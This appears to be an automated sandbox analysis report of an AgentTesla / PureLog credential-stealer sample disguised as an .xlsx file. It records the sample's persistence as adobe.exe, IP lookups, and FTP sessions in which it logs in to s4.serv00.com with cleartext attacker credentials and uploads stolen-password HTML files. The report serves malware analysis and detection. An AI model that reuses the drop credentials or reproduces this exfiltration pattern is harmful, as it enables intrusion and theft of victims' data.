                                  Jul 23, 2024 15:05:10.736921072 CEST49738443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:10.740000010 CEST49738443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:11.201653004 CEST4973921192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:11.831398010 CEST2149739213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:11.831491947 CEST4973921192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:11.835849047 CEST4973921192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:11.843100071 CEST2149739213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:11.843146086 CEST4973921192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:17.553463936 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:17.553508043 CEST44349746104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:17.553584099 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:17.556786060 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:17.556808949 CEST44349746104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:18.051497936 CEST44349746104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:18.051568031 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:18.072128057 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:18.072161913 CEST44349746104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:18.072412014 CEST44349746104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:18.130326986 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:18.208626032 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:18.252507925 CEST44349746104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:18.327044010 CEST44349746104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:18.327117920 CEST44349746104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:18.327332973 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:18.329912901 CEST49746443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:18.899457932 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:18.904476881 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:18.904540062 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:19.509800911 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:19.510204077 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:19.515167952 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:19.699445963 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:19.699590921 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:19.704376936 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:19.975642920 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:19.975974083 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:19.980865002 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.165285110 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.165409088 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:20.170222998 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.354471922 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.354814053 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:20.359586000 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.551489115 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.551718950 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:20.556684017 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.746926069 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.747486115 CEST4974863434192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:20.765273094 CEST6343449748213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:20.765345097 CEST4974863434192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:20.765441895 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:20.774183989 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:21.331039906 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:21.331691027 CEST4974863434192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:21.331736088 CEST4974863434192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:21.341914892 CEST6343449748213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:21.346076965 CEST6343449748213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:21.347467899 CEST4974863434192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:21.380374908 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:21.530711889 CEST2149747213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:05:21.583507061 CEST4974721192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:06:25.330521107 CEST4975021192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:06:25.339253902 CEST2149750213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:06:25.339457989 CEST4975021192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:06:25.341583014 CEST4975021192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:06:25.357913971 CEST2149750213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:06:25.372231007 CEST2149750213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:06:25.372292042 CEST4975021192.168.2.4213.189.52.181
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 23, 2024 15:04:55.449186087 CEST5763753192.168.2.41.1.1.1
                                  Jul 23, 2024 15:04:55.485059023 CEST53576371.1.1.1192.168.2.4
                                  Jul 23, 2024 15:04:57.176047087 CEST5843653192.168.2.41.1.1.1
                                  Jul 23, 2024 15:04:57.190607071 CEST53584361.1.1.1192.168.2.4
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 23, 2024 15:04:55.449186087 CEST192.168.2.41.1.1.10xa244Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Jul 23, 2024 15:04:57.176047087 CEST192.168.2.41.1.1.10x9991Standard query (0)s4.serv00.comA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 23, 2024 15:04:55.485059023 CEST1.1.1.1192.168.2.40xa244No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                  Jul 23, 2024 15:04:55.485059023 CEST1.1.1.1192.168.2.40xa244No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                  Jul 23, 2024 15:04:55.485059023 CEST1.1.1.1192.168.2.40xa244No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                  Jul 23, 2024 15:04:57.190607071 CEST1.1.1.1192.168.2.40x9991No error (0)s4.serv00.com213.189.52.181A (IP address)IN (0x0001)false
                                  • api.ipify.org
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.449732104.26.12.2054432912C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
                                  TimestampBytes transferredDirectionData
                                  2024-07-23 13:04:56 UTC155OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                  Host: api.ipify.org
                                  Connection: Keep-Alive
                                  2024-07-23 13:04:56 UTC211INHTTP/1.1 200 OK
                                  Date: Tue, 23 Jul 2024 13:04:56 GMT
                                  Content-Type: text/plain
                                  Content-Length: 11
                                  Connection: close
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a7be10ed8b842fb-EWR
                                  2024-07-23 13:04:56 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.449738104.26.12.2054435852C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                  TimestampBytes transferredDirectionData
                                  2024-07-23 13:05:10 UTC155OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                  Host: api.ipify.org
                                  Connection: Keep-Alive
                                  2024-07-23 13:05:10 UTC211INHTTP/1.1 200 OK
                                  Date: Tue, 23 Jul 2024 13:05:10 GMT
                                  Content-Type: text/plain
                                  Content-Length: 11
                                  Connection: close
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a7be169b9554346-EWR
                                  2024-07-23 13:05:10 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.449746104.26.12.2054437500C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                  TimestampBytes transferredDirectionData
                                  2024-07-23 13:05:18 UTC155OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                  Host: api.ipify.org
                                  Connection: Keep-Alive
                                  2024-07-23 13:05:18 UTC211INHTTP/1.1 200 OK
                                  Date: Tue, 23 Jul 2024 13:05:18 GMT
                                  Content-Type: text/plain
                                  Content-Length: 11
                                  Connection: close
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a7be1992beb4234-EWR
                                  2024-07-23 13:05:18 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Jul 23, 2024 15:04:57.831351995 CEST2149734213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.220-This is a private system - No anonymous login
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 15:04. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                  Jul 23, 2024 15:04:57.831691980 CEST4973421192.168.2.4213.189.52.181USER f2241_dol
                                  Jul 23, 2024 15:04:58.029808044 CEST2149734213.189.52.181192.168.2.4331 User f2241_dol OK. Password required
                                  Jul 23, 2024 15:04:58.030071974 CEST4973421192.168.2.4213.189.52.181PASS Doll900#@
                                  Jul 23, 2024 15:04:58.308783054 CEST2149734213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                                  Jul 23, 2024 15:04:58.509210110 CEST2149734213.189.52.181192.168.2.4504 Unknown command
                                  Jul 23, 2024 15:04:58.509377003 CEST4973421192.168.2.4213.189.52.181PWD
                                  Jul 23, 2024 15:04:58.709877014 CEST2149734213.189.52.181192.168.2.4257 "/" is your current location
                                  Jul 23, 2024 15:04:58.710068941 CEST4973421192.168.2.4213.189.52.181TYPE I
                                  Jul 23, 2024 15:04:58.913053036 CEST2149734213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                                  Jul 23, 2024 15:04:58.913338900 CEST4973421192.168.2.4213.189.52.181PASV
                                  Jul 23, 2024 15:04:59.108258009 CEST2149734213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,246,67)
                                  Jul 23, 2024 15:04:59.113822937 CEST4973421192.168.2.4213.189.52.181STOR PW_user-405464_2024_07_23_09_04_55.html
                                  Jul 23, 2024 15:04:59.682493925 CEST2149734213.189.52.181192.168.2.4150 Accepted data connection
                                  Jul 23, 2024 15:04:59.877233982 CEST2149734213.189.52.181192.168.2.4226-File successfully transferred
                                  226-File successfully transferred226 0.199 seconds (measured here), 1.70 Kbytes per second
                                  Jul 23, 2024 15:05:19.509800911 CEST2149747213.189.52.181192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 15:05. Server port: 21.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 15:05. Server port: 21.220-This is a private system - No anonymous login
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 15:05. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
                                  Jul 23, 2024 15:05:19.510204077 CEST4974721192.168.2.4213.189.52.181USER f2241_dol
                                  Jul 23, 2024 15:05:19.699445963 CEST2149747213.189.52.181192.168.2.4331 User f2241_dol OK. Password required
                                  Jul 23, 2024 15:05:19.699590921 CEST4974721192.168.2.4213.189.52.181PASS Doll900#@
                                  Jul 23, 2024 15:05:19.975642920 CEST2149747213.189.52.181192.168.2.4230 OK. Current restricted directory is /
                                  Jul 23, 2024 15:05:20.165285110 CEST2149747213.189.52.181192.168.2.4504 Unknown command
                                  Jul 23, 2024 15:05:20.165409088 CEST4974721192.168.2.4213.189.52.181PWD
                                  Jul 23, 2024 15:05:20.354471922 CEST2149747213.189.52.181192.168.2.4257 "/" is your current location
                                  Jul 23, 2024 15:05:20.354814053 CEST4974721192.168.2.4213.189.52.181TYPE I
                                  Jul 23, 2024 15:05:20.551489115 CEST2149747213.189.52.181192.168.2.4200 TYPE is now 8-bit binary
                                  Jul 23, 2024 15:05:20.551718950 CEST4974721192.168.2.4213.189.52.181PASV
                                  Jul 23, 2024 15:05:20.746926069 CEST2149747213.189.52.181192.168.2.4227 Entering Passive Mode (213,189,52,181,247,202)
                                  Jul 23, 2024 15:05:20.765441895 CEST4974721192.168.2.4213.189.52.181STOR PW_user-405464_2024_07_23_09_05_17.html
                                  Jul 23, 2024 15:05:21.331039906 CEST2149747213.189.52.181192.168.2.4150 Accepted data connection
                                  Jul 23, 2024 15:05:21.530711889 CEST2149747213.189.52.181192.168.2.4226-File successfully transferred
                                  226-File successfully transferred226 0.201 seconds (measured here), 1.68 Kbytes per second

                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:09:04:51
                                  Start date:23/07/2024
                                  Path:C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"
                                  Imagebase:0xf30000
                                  File size:830'464 bytes
                                  MD5 hash:7DC8BA9345DE935C7B90EA6C61F3464F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:09:04:53
                                  Start date:23/07/2024
                                  Path:C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"
                                  Imagebase:0x460000
                                  File size:830'464 bytes
                                  MD5 hash:7DC8BA9345DE935C7B90EA6C61F3464F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:3
                                  Start time:09:05:06
                                  Start date:23/07/2024
                                  Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                  Imagebase:0x640000
                                  File size:830'464 bytes
                                  MD5 hash:7DC8BA9345DE935C7B90EA6C61F3464F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1813288032.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 74%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:4
                                  Start time:09:05:08
                                  Start date:23/07/2024
                                  Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                  Imagebase:0xd40000
                                  File size:830'464 bytes
                                  MD5 hash:7DC8BA9345DE935C7B90EA6C61F3464F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Target ID:6
                                  Start time:09:05:15
                                  Start date:23/07/2024
                                  Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                  Imagebase:0x860000
                                  File size:830'464 bytes
                                  MD5 hash:7DC8BA9345DE935C7B90EA6C61F3464F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:7
                                  Start time:09:05:16
                                  Start date:23/07/2024
                                  Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                  Imagebase:0x8b0000
                                  File size:830'464 bytes
                                  MD5 hash:7DC8BA9345DE935C7B90EA6C61F3464F
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:9.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:77
                                    Total number of Limit Nodes:10
                                    execution_graph 32944 7815040 32945 781508e DrawTextExW 32944->32945 32947 78150e6 32945->32947 32948 78120d0 32949 7812129 32948->32949 32950 7812162 32949->32950 32952 78121b8 32949->32952 32953 7812197 32952->32953 32954 78121bb 32952->32954 32953->32950 32955 78121f0 32954->32955 32957 78122a1 32954->32957 32961 7811320 GetSystemMetrics GetSystemMetrics 32955->32961 32960 7812372 32957->32960 32962 7811320 GetSystemMetrics GetSystemMetrics 32957->32962 32958 7812240 32958->32950 32960->32950 32961->32958 32962->32960 32963 78162d0 32964 78162f4 32963->32964 32965 78162fb 32963->32965 32969 7816322 32965->32969 32970 781429c 32965->32970 32968 781429c GetCurrentThreadId 32968->32969 32971 78142a7 32970->32971 32972 7816318 32971->32972 32973 781663f GetCurrentThreadId 32971->32973 32972->32968 32973->32972 32912 30db0b8 32916 30db19f 32912->32916 32924 30db1b0 32912->32924 32913 30db0c7 32917 30db1ac 32916->32917 32918 30db1e4 32917->32918 32932 30db448 32917->32932 32936 30db43b 32917->32936 32918->32913 32919 30db3e8 GetModuleHandleW 32921 30db415 32919->32921 32920 30db1dc 32920->32918 32920->32919 32921->32913 32925 30db1b1 32924->32925 32926 30db1e4 32925->32926 32930 30db448 LoadLibraryExW 32925->32930 32931 30db43b LoadLibraryExW 32925->32931 32926->32913 32927 30db3e8 GetModuleHandleW 32929 30db415 32927->32929 32928 30db1dc 32928->32926 32928->32927 32929->32913 32930->32928 32931->32928 32934 30db449 32932->32934 32933 30db481 32933->32920 32934->32933 32940 30dabb8 32934->32940 32937 30db444 32936->32937 32938 30db481 32937->32938 32939 30dabb8 LoadLibraryExW 32937->32939 32938->32920 32939->32938 32941 30db608 LoadLibraryExW 32940->32941 32943 30db681 32941->32943 32943->32933 32974 30d4668 32975 30d4669 32974->32975 32976 30d4686 32975->32976 32978 30d4778 32975->32978 32979 30d477c 32978->32979 32983 30d4878 32979->32983 32987 30d4888 32979->32987 32985 30d4880 32983->32985 32984 30d498c 32984->32984 32985->32984 32991 30d44b0 32985->32991 32988 30d4889 32987->32988 32989 30d44b0 CreateActCtxA 32988->32989 32990 30d498c 32988->32990 32989->32990 32992 30d5918 CreateActCtxA 32991->32992 32994 30d59db 32992->32994 32994->32994 32995 30dd668 32996 30dd6b6 DuplicateHandle 32995->32996 32997 30dd6fe 32996->32997 32902 30dd420 32903 30dd466 GetCurrentProcess 32902->32903 32905 30dd4b8 GetCurrentThread 32903->32905 32906 30dd4b1 32903->32906 32907 30dd4ee 32905->32907 32908 30dd4f5 GetCurrentProcess 32905->32908 32906->32905 32907->32908 32911 30dd52b 32908->32911 32909 30dd553 GetCurrentThreadId 32910 30dd584 32909->32910 32911->32909

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 296 7e430f8-7e4312a 299 7e43130-7e431c4 296->299 300 7e43658-7e43676 296->300 325 7e431c6-7e431ca 299->325 326 7e431d0-7e43227 299->326 303 7e43a71-7e43a7d 300->303 305 7e43684-7e43690 303->305 306 7e43a83 303->306 307 7e43a85-7e43a8a 305->307 308 7e43696-7e43716 305->308 309 7e43a95-7e43a9c 306->309 307->309 327 7e4372e-7e43747 308->327 328 7e43718-7e4371e 308->328 325->326 352 7e435a2-7e435c6 326->352 353 7e4322d-7e43235 326->353 333 7e43777-7e437b5 327->333 334 7e43749-7e43772 327->334 329 7e43720 328->329 330 7e43722-7e43724 328->330 329->327 330->327 348 7e437b7-7e437d8 333->348 349 7e437da-7e437e7 333->349 345 7e43a6e 334->345 345->303 358 7e437ee-7e437f4 348->358 349->358 362 7e4364a-7e43656 352->362 355 7e43237-7e4323b 353->355 356 7e4323c-7e43244 353->356 355->356 359 7e43246 356->359 360 7e43249-7e4326b 356->360 363 7e437f6-7e43811 358->363 364 7e43813-7e43865 358->364 359->360 367 7e43270-7e43276 360->367 368 7e4326d 360->368 362->300 363->364 397 7e43980-7e439bf 364->397 398 7e4386b-7e43870 364->398 372 7e43525-7e43530 367->372 373 7e4327c-7e43296 367->373 368->367 379 7e43535-7e4356c 372->379 380 7e43532 372->380 375 7e43298-7e4329c 373->375 376 7e432db-7e432e4 373->376 375->376 381 7e4329e-7e432a9 375->381 382 7e43645 376->382 383 7e432ea-7e432fa 376->383 412 7e4356e-7e43598 379->412 413 7e4359a 379->413 380->379 386 7e43337-7e433e4 381->386 387 7e432af 381->387 382->362 383->382 388 7e43300-7e43311 383->388 400 7e433f4-7e434bc 386->400 401 7e433e6 386->401 389 7e432b2-7e432b4 387->389 388->382 390 7e43317-7e43327 388->390 393 7e432b6 389->393 394 7e432ba-7e432c5 389->394 390->382 396 7e4332d-7e43334 390->396 393->394 394->382 399 7e432cb-7e432d7 394->399 396->386 422 7e439c1-7e439d9 397->422 423 7e439db-7e439ea 397->423 406 7e4387a-7e4387d 398->406 399->389 403 7e432d9 399->403 419 7e434c2-7e434c6 400->419 420 7e435cb-7e435dd 400->420 401->400 404 7e433e8-7e433ee 401->404 403->386 404->400 409 7e43883 406->409 410 7e43948-7e43970 406->410 414 7e438ec-7e43918 409->414 415 7e4388a-7e438b6 409->415 416 7e4391a-7e43946 409->416 417 7e438bb-7e438e7 409->417 421 7e43976-7e4397a 410->421 412->413 413->352 414->421 415->421 416->421 417->421 419->420 426 7e434cc-7e434db 419->426 420->382 427 7e435df-7e435fc 420->427 421->397 421->406 431 7e439f3-7e43a55 422->431 423->431 432 7e434dd 426->432 433 7e4351b-7e4351f 426->433 427->382 434 7e435fe-7e4361a 427->434 445 7e43a60-7e43a67 431->445 436 7e434e3-7e434e5 432->436 433->372 433->373 434->382 437 7e4361c-7e4363a 434->437 439 7e434e7-7e434eb 436->439 440 7e434ef-7e4350b 436->440 437->382 441 7e4363c 437->441 439->440 440->382 443 7e43511-7e43519 440->443 441->382 443->433 443->436 445->345
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'kq$TJpq$Tekq$poq$xbnq
                                    • API String ID: 0-2301093937
                                    • Opcode ID: f79b2183acbc6387875f315a943b5415d0636edf7df80ee7bdc9e28628d2ffa5
                                    • Instruction ID: a8918de6a82c7d5297b78771d0147d7f05bde843194684cac597b48179e8113f
                                    • Opcode Fuzzy Hash: f79b2183acbc6387875f315a943b5415d0636edf7df80ee7bdc9e28628d2ffa5
                                    • Instruction Fuzzy Hash: FF622775A00219DFDB55DF68D984AA9BBB2FF48304F1581A8E509AB376CB31EC91CF40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675466738.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: true
                                    • Associated: 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8300000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b4ad4fe9a178d541bcc145c61169730fbb2e6825d1d288916e23a683396064af
                                    • Instruction ID: 8766590fac2b9ae200cebc95c80b3212e8db1b7ce2898654422bef7dd8146506
                                    • Opcode Fuzzy Hash: b4ad4fe9a178d541bcc145c61169730fbb2e6825d1d288916e23a683396064af
                                    • Instruction Fuzzy Hash: 20E11774E01219CFCB14DFA9D5809AEFBB2FF88305F248169E415AB356D734A941CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
